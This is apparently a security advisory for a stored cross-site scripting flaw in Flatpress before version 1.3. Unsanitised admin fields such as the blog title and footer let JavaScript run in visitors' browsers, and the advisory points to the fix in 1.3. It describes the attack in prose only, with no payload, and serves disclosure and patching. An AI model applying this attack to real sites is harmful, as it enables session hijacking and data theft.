Cross-site Scripting (XSS) - Stored in flatpressblog/flatpress

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in Flatpress prior to version 1.3. The bug resides in the admin configuration panel, where input fields such as blog title, subtitle, and footer are not properly sanitized before being stored and later rendered on the blog. Affected versions: all versions before 1.3 [1][2].

Exploitation

An attacker with administrative access can inject arbitrary JavaScript code into any of the vulnerable configuration fields. Once saved, the malicious script is stored and automatically executed when any user views pages that display these settings, such as the blog homepage or entries that include the footer. No additional user interaction is required beyond normal page viewing [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser, enabling session hijacking, defacement, or theft of sensitive data. The attacker effectively gains the ability to perform actions on behalf of the victim, including administrative actions if the victim is an admin [1][2].

Mitigation

The vulnerability is fixed in Flatpress version 1.3, released with commit 3a32aad [1]. Users should upgrade to Flatpress 1.3 or later immediately. No workarounds are documented in the available references.